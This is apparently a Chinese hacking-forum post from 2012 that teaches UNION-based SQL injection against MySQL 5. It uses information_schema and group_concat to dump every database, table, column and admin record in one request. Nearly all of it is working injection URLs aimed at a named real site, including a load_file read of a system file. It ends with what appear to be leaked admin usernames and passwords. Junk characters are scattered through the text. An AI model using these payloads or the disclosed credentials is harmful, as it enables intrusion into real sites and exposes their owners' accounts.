此方法只适用于Mysql 5.0以及5.0以上版本 注入方法和mysql 5 类似
7 v7 T) X; w3 B3 B' n0 G8 s但此方法大大提高了读取数据库的速度,此方法并非本人原创,原创出处是国外某牛人
; C! U4 R' ?+ A, O% w/ v8 u! z) l9 n1 [& w" }+ e7 o
5 P% k8 P- f$ }/ ^9 w
优点在于可以利用information_schema库与group_concat的配合 来达到一次性读取出指定数据库里的内容,并且在limit被限制的情况下依然可以注入 O; b/ P+ _8 ^3 b
* U. L6 |$ p# p4 d' Z9 f, R缺点 当一个库存在几百甚至几千个表和表字段和数据的时候 读取出数据的时间会相当的慢...
" d3 [$ [7 z! \3 O+ L
5 Z) Y+ M, m* e+ }+ w, R8 |: G' F下面用简单实例来演示 原理不多说,相信经常玩注入的朋友都知道了.只挑重要部分实例演示2 I# s* d3 s8 q! e
在注入时根据实际情况作出变化 比如过滤了空格,使用/**/ , + 等等1 W3 C: |& e, x: J6 z) P
5 Y$ x. P; n+ ihttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,database(),10,11,12,13,14,15,16,17
6 W; w$ Z! ]8 y+ T% H: I9 ~
4 E' w) X I+ @. {; J$ @- ]读出所有库:( p( X3 w8 ~( E* o& ~1 d( }
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(schema_name),10,11,12,13,14,15,16,17 from information_schema.SCHEMATA
6 I, N7 U5 E2 z7 P. ?8 {! d
8 Y; ^+ c" G6 q1 g. g5 N1 y+ I) s! ~$ C. I0 ?& h
, ] N7 \# p" j/ k! U+ N
读出所有表:+ U1 s" _( ]$ k" w
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(table_name),10,11,12,13,14,15,16,17 from information_schema.tables where table_schema=database()
! n6 @: { O, B0 t7 P5 I" j! T2 i7 v! i K% A0 V
读出所有表字段:8 N- A1 ]! Y# Z% f9 l7 P( z
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(column_name),10,11,12,13,14,15,16,17 from information_schema.COLUMNS where table_schema=database() and table_name=char(97,100,109,105,110)
# s+ V. C: |8 G2 n7 b7 \* G*/ (97,100,109,105,110)为admin的ascii码 依次类推. _9 I+ E6 e1 F2 [
- n i- F+ h( O( ]- z' p
读出所有表字段里的内容:
# @! h/ x" T4 N% x6 ~http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,group_concat(password),group_concat(admin),10,11,12,13,14,15,16,17 from admin% p8 l' U& X+ `9 H5 N8 C5 w
4 |8 K( h9 z2 X7 `( i7 r. F0 s; `( w6 _; G* Z
" J6 U; e G& ^
5 g/ j' M" q$ W# P; p" E
C' V9 f9 m0 L9 Z, v! J2 L# y* l
9 a2 v7 `6 K) G
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),load_file(CHAR(99, 58, 92, 98, 111, 111, 116, 46, 105, 110, 105)),4,5,6,7+%23
* r3 g$ }; j6 l; i( \# e7 ^
8 Y4 q" {' [' y, K5 _0 w# h
. E9 Q) T. z+ Y0 [5 Bhttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(schema_name),4,5,6,7+from+information_schema.schemata%23
; o A$ J; g. [4 j2 W. |+ v& l& Z) `: L3 i; j0 E: L6 B6 U
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(column_name),4,5,6,7+from+information_schema.COLUMNS where table_schema=database()+and+table_name=char(97,100,109,105,110)%23" Q0 [0 B, v: O2 f
/ w9 L2 t0 y( O6 a' a( G0 a/ I; O5 K# [" S4 g" w! F) N
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(admin_name,0x3a,admin_password),4,5,6,7+from+admin%23
: u( P/ J% ]- E# t) |" u6 R4 ~3 l+ r- h2 Q) k
8 x X5 F! q4 s& F webmaster:dzb521123,simlab:simadmin20043233% p. A# T; O: U% I) n8 B8 s3 a
|
发表于 2012-9-13 16:37:34
收藏
支持
反对